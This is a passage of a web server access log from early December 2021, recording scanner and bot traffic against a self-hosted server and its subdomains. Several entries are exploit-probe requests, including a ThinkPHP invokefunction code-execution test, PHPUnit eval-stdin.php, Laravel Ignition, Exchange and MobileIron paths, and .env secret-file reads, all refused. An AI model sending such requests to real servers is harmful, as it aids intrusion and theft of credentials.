162.142.125.60] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:20:59:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.43] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:20:59:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.41] [Length 252] [Gzip -] "-" "-" [02/Dec/2021:20:59:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.42] [Length 252] [Gzip -] "-" "-" [02/Dec/2021:20:59:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "-" "-" [02/Dec/2021:20:59:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.60] [Length 252] [Gzip -] "-" "-" [02/Dec/2021:20:59:11 +0000] 400 - GET http whoami.moralanimal.net "/" [Client 162.142.125.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [02/Dec/2021:21:35:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.113] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:21:35:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "-" "-" [02/Dec/2021:21:35:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [02/Dec/2021:21:49:16 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:22:09:52 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Dec/2021:22:09:52 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Dec/2021:22:09:52 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Dec/2021:22:09:52 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Dec/2021:22:09:52 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Dec/2021:22:09:52 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Dec/2021:22:45:20 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [02/Dec/2021:23:38:56 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:00:17:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.79] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Dec/2021:00:21:44 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:00:49:24 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.25] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Dec/2021:01:04:02 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:01:18:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.140.188.58] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [03/Dec/2021:01:59:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.209.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Dec/2021:02:00:20 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Dec/2021:02:01:05 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.164] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Dec/2021:02:04:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:02:24:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Dec/2021:02:42:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.94] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [03/Dec/2021:02:46:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.71] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [03/Dec/2021:02:46:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 118.193.45.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [03/Dec/2021:02:54:19 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.212] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Dec/2021:03:13:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [03/Dec/2021:03:22:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:03:48:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.122] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Dec/2021:04:15:10 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [03/Dec/2021:05:06:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:05:35:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [03/Dec/2021:06:06:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.227.254] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [03/Dec/2021:07:03:32 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:07:03:33 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:07:08:06 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 34.96.130.1] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [03/Dec/2021:07:14:10 +0000] 444 - GET https io.moralanimal.net "/" [Client 34.77.162.31] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [03/Dec/2021:07:16:39 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:07:16:40 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:07:32:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Dec/2021:08:32:04 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:08:32:04 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:08:38:35 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [03/Dec/2021:08:38:35 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [03/Dec/2021:09:35:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.68] [Length 0] [Gzip -] "-" "-" [03/Dec/2021:09:41:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Dec/2021:09:43:25 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.89] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Dec/2021:10:07:39 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 34.77.162.27] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [03/Dec/2021:11:05:34 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Dec/2021:11:14:07 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:11:14:07 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:13:02:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.46] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Dec/2021:14:04:51 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 34.77.162.21] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [03/Dec/2021:14:05:20 +0000] 400 - GET http 64.22.31.253 "/zeh7dkwfdxw99tdk/" [Client 80.82.78.39] [Length 252] [Gzip -] "Mozilla/5.0" "-" [03/Dec/2021:14:05:24 +0000] 444 - GET https 64.22.31.253 "/zeh7dkwfdxw99tdk/" [Client 80.82.78.39] [Length 0] [Gzip -] "Mozilla/5.0" "-" [03/Dec/2021:14:06:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Dec/2021:15:08:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.148.145.7] [Length 0] [Gzip -] "libwww-perl/6.58" "-" [03/Dec/2021:15:11:03 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:15:11:03 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:16:10:43 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:17:15:16 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:17:36:26 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:18:08:58 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [03/Dec/2021:18:32:18 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:18:32:18 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:18:44:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.166] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [03/Dec/2021:18:49:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.44] [Length 0] [Gzip -] "-" "-" [03/Dec/2021:18:49:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.44] [Length 252] [Gzip -] "-" "-" [03/Dec/2021:18:49:37 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [03/Dec/2021:18:54:14 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:19:21:50 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:19:21:50 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:19:42:37 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:19:42:37 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:20:03:27 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 162.216.243.177] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" "-" [03/Dec/2021:20:26:26 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [03/Dec/2021:20:27:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Dec/2021:20:27:59 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 92.118.160.13] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [03/Dec/2021:20:53:24 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:21:19:22 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:21:19:23 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Dec/2021:21:34:17 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 34.96.130.7] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [03/Dec/2021:21:52:34 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [03/Dec/2021:22:13:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.57] [Length 0] [Gzip -] "-" "-" [03/Dec/2021:22:13:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.57] [Length 252] [Gzip -] "-" "-" [03/Dec/2021:22:13:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [03/Dec/2021:23:17:17 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.86.35.5] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [03/Dec/2021:23:19:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Dec/2021:23:45:38 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [04/Dec/2021:00:02:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.57] [Length 0] [Gzip -] "-" "-" [04/Dec/2021:00:02:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.116] [Length 0] [Gzip -] "-" "-" [04/Dec/2021:00:02:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.57] [Length 0] [Gzip -] "-" "-" [04/Dec/2021:00:02:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "-" "-" [04/Dec/2021:00:02:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.57] [Length 252] [Gzip -] "-" "-" [04/Dec/2021:00:02:17 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.57] [Length 252] [Gzip -] "-" "-" [04/Dec/2021:00:52:48 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.118] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Dec/2021:01:32:49 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 34.96.130.29] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [04/Dec/2021:02:00:57 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.212.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Dec/2021:02:02:04 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Dec/2021:02:02:23 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Dec/2021:02:54:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [04/Dec/2021:02:57:21 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/config.exp" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Dec/2021:02:58:42 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.212.117] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Dec/2021:03:55:17 +0000] 444 - GET https pop.moralanimal.net "/" [Client 34.96.130.27] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [04/Dec/2021:04:26:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Dec/2021:04:31:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 52.87.70.176] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/50.0.3021.62 Safari/537.32" "-" [04/Dec/2021:04:31:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 52.87.70.176] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/50.0.3021.62 Safari/537.32" "-" [04/Dec/2021:04:54:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.66] [Length 0] [Gzip -] "-" "-" [04/Dec/2021:06:02:51 +0000] 444 - GET https 64.22.31.253 "/owa/auth.owa" [Client 173.232.146.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" "-" [04/Dec/2021:08:53:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 204.8.156.142] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [04/Dec/2021:08:54:03 +0000] 400 - - https localhost "-" [Client 23.129.64.139] [Length 154] [Gzip -] "-" "-" [04/Dec/2021:08:54:05 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 209.141.58.146] [Length 0] [Gzip -] "-" "-" [04/Dec/2021:08:54:06 +0000] 444 - OPTIONS https localhost "/" [Client 163.172.213.212] [Length 0] [Gzip -] "-" "-" [04/Dec/2021:08:54:13 +0000] 400 - - https localhost "-" [Client 45.154.255.147] [Length 154] [Gzip -] "-" "-" [04/Dec/2021:08:56:59 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.790.0 Safari/535.1" "-" [04/Dec/2021:08:56:59 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.3 Safari/533.2" "-" [04/Dec/2021:08:56:59 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [04/Dec/2021:09:42:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Dec/2021:09:42:55 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.208.29] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Dec/2021:12:39:33 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Dec/2021:13:03:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.210.226] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Dec/2021:13:14:08 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [04/Dec/2021:13:14:08 +0000] 400 - - http localhost "-" [Client 